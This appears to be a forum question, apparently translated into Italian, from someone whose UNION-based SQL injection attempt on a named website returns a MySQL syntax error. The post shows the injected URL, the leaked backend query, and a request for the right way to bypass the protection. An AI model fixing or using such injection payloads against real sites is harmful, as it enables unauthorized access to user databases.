Sto cercando di inserire la query di base, ma penso che mi manchi come commentare la fine di quelle query.
I tough using # o --' funzionano ma sto ancora finendo con questo tipo di errore:
Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TABLE user ;--' ORDER BY c2_.creationDate DESC' at line 1
Quindi qual è il modo corretto per aggirare tali sicurezza?
Che cosa sto facendo male quando ho scritto:
http://esgi-3.futest.com/subject/12%20UNION%20SELECT%20*%20FROM%20TABLE%20user%20;--'
E questo è l'intero errore che ottengo:
An exception occurred while executing 'SELECT s0_.text AS text, s0_.creationDate AS creationDate, s0_.private AS private, u1_.firstName AS firstName, u1_.lastName AS lastName, s0_.user AS user, c2_.userId AS userId24, c2_.subjectId AS subjectId25 FROM subject s0_ INNER JOIN user u1_ ON s0_.user = u1_.id LEFT JOIN comment c2_ ON s0_.id = c2_.subjectId LEFT JOIN user u3_ ON c2_.userId = u3_.id WHERE s0_.id = 12 UNION SELECT * FROM TABLE user ;--' ORDER BY c2_.creationDate DESC': SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TABLE user ;--' ORDER BY c2_.creationDate DESC' at line 1